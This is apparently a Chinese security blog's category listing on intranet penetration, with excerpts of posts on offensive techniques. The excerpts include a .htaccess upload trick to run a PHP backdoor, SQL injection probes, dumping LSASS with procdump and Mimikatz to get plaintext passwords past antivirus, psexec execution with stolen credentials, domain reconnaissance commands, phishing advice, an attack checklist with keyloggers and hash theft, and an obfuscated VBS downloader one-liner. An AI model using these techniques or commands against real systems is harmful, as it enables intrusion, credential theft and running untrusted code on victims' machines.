
内网渗透
冷风
网络安全编程,远程控制编写
展开
-
修改.htaccess执行非php文件
是个很老技术了,有一个php上传,可以控制上传的文件名,但服务器端做了过滤,文件名中不能包含php字符串,各种绕过无效。后面就上传了一个 .htaccess文件里面只有一句AddType application/x-httpd-php .abc之后,把php后门改成 xx.abc上传上去就可以执行了。原创 2015-06-18 17:05:56 · 5684 阅读 · 0 评论 -
社工邮箱搜索神器theharvester.py
效果很好、很好,theharvester.py -d tobacco.gov.cn -l 500 -b baidu原创 2014-10-20 22:20:41 · 7329 阅读 · 0 评论 -
owasp 目录枚举软件DirBuster
owasp 目录枚举软件DirBuster原创 2014-10-31 00:43:52 · 5696 阅读 · 0 评论 -
Android利用Fiddler进行网络数据抓包
主要介绍Android及IPhone手机上如何进行网络数据抓包,比如我们想抓某个应用(微博、微信、墨迹天气)的网络通信请求就可以利用这个方法。 相对于tcpdump配合wireshark抓包的优势在于:(1)无需root (2)对Android和Iphone同样适用 (3)操作更简单方便(第一次安装配置,第二次只需设置代理即可) (4)数据包的查看更清晰易懂,Fiddler的UI更简单明了 (5)转载 2014-07-15 15:49:28 · 1917 阅读 · 0 评论 -
注入点的判断及猜解
注入点的判断及猜解本文由zoujialan贡献一、注入点的判断及猜解1.加入单引号 ’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被代入SQL查询语句进行查询,如果转载 2014-06-27 11:05:10 · 17437 阅读 · 0 评论 -
nessus 安装笔记
1.首先去如下地址下载相应的版本注意32位64位http://www.tenable.com/products/nessus/select-your-operating-system2.直接安装后会让注册一个管理员账号与密码可随意3.安装过程会让输入一个激活码,激活码从如下网址获取http://www.nessus.org/products/nessus/nessus-plugins/regist原创 2013-10-10 12:07:31 · 3887 阅读 · 0 评论 -
利用procdump+Mimikatz 绕过杀软获取Windows明文密码
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6转载 2013-09-30 15:18:16 · 25785 阅读 · 0 评论 -
我是如何诱骗你的-高级钓鱼技术
经常有人问我如何进行钓鱼。email钓鱼是种很吸引人的攻击。成功实施一次email钓鱼需要有非常系统的方法。其中,前期准备阶段占用了整个攻击的大部分时间。一个安全的邮件收发系统建立在多层次的架构之上,因此我们的钓鱼邮件有可能会被不同层次的安全层过滤掉。其中包括Email网关垃圾邮件过滤器、Outlook的“Junk Email”过滤器、杀毒软件、PS(入侵防御系统)、Web代理服务器、外出过滤等等转载 2013-09-30 12:52:56 · 3260 阅读 · 0 评论 -
如何在CMD命令提示符下移除USB设备
首先,你要借助devcon这个微软提供的工具。如下是微软的介绍(http://support.microsoft.com/kb/311272/zh-cn):DevCon 实用工具是一种命令行实用工具,可以替代设备管理器。使用 DevCon,您可以启用、禁用、重新启动、更新、删除和查询单个设备或一组设备。DevCon 还提供与驱动程序开发人员有关、但无法在设备管理器中看到的信息。可以将 DevCon原创 2013-07-22 17:00:09 · 7523 阅读 · 0 评论 -
pstools psexec 执行文件
在目标上第一次执行时会有一个提示,请使用如下命令设置为“同意”pslist.exe -accepteula拿到目标用户与密码以后,通过psexec来执行一个文件命令如下 Psexec.exe \\10.10.7.123 -u user -p 9893 -d D:\dell\s.exe原创 2013-07-22 11:29:53 · 1786 阅读 · 0 评论 -
域命令相关命令
关于域命令的东西,为方便大家,整理一份,希望给大家带来一些帮助!~查询域管理员用户:net group “domain admins” /domain查询域用户:net user /domain查询域名称:net view /domain查询域内计算机:net view /domain:XX查询域控制器:net time /domain查询所有域控制器:dsquery server例:dsquer原创 2013-07-20 17:46:45 · 4456 阅读 · 0 评论 -
常规内网渗透思路总结
相对来说,网上的资料少之又少,很少有人对内网渗透写出一些详细的资料以供同行们参考。今天在这,只是大致的讲一下内网的一些知识。 首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了。但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题。 在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,转载 2013-07-05 15:06:28 · 2702 阅读 · 0 评论 -
内网渗透思路
内网渗透思路1. 加固,感染系统盘之外的EXE文件保护目标。2. 上键盘记录和USB插件3. 记录目标杀软。4. 抓取HASH。5. 获取目标网络环境,工作组还是域环境。6. 搜索主机是否有网络管理软件5. 搜索主机中所有docxls ppt等关键文件,并下载。6. 对方是否使用outlook,下载PST文件并抓取密码。7. 查看对方是否连接过338原创 2013-07-09 18:23:30 · 2429 阅读 · 0 评论 -
浅谈内网渗透
假设我们现在已经处在一个内网中,该内网处于域中。我们的终极目标是实现对域控制器的控制。内网信息获取信息的获取直接通过Windows自带的命令即可实现,简单写出来:ipconfig /allnetstat –annet startnet usernet user /domainnet group “domain admins” #查看域管理员net localgroup a转载 2013-07-05 15:34:49 · 1434 阅读 · 0 评论 -
8.4.3 带ARP欺骗攻击的渗透利刃--hijack(1)
8.4.3 带ARP欺骗攻击的渗透利刃--hijack(1)2009-12-21 13:28 肖遥 电子工业出版社 我要评论(0) 字号:T | T综合评级:想读(9) 在读(5) 已读(2) 品书斋鉴(1) 已有16人发表书评《网络渗透攻击与安防修炼》第1章为大家讲述的是入侵不过是一场欺骗,渗透入侵的高级手法。本节为大家介绍带ARP欺骗攻击的渗透利刃--hijack。AD:2013大转载 2013-05-15 19:28:02 · 1703 阅读 · 0 评论 -
一句话vbs下载
dark发的,记录下。echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile ws原创 2015-07-13 11:11:53 · 3349 阅读 · 0 评论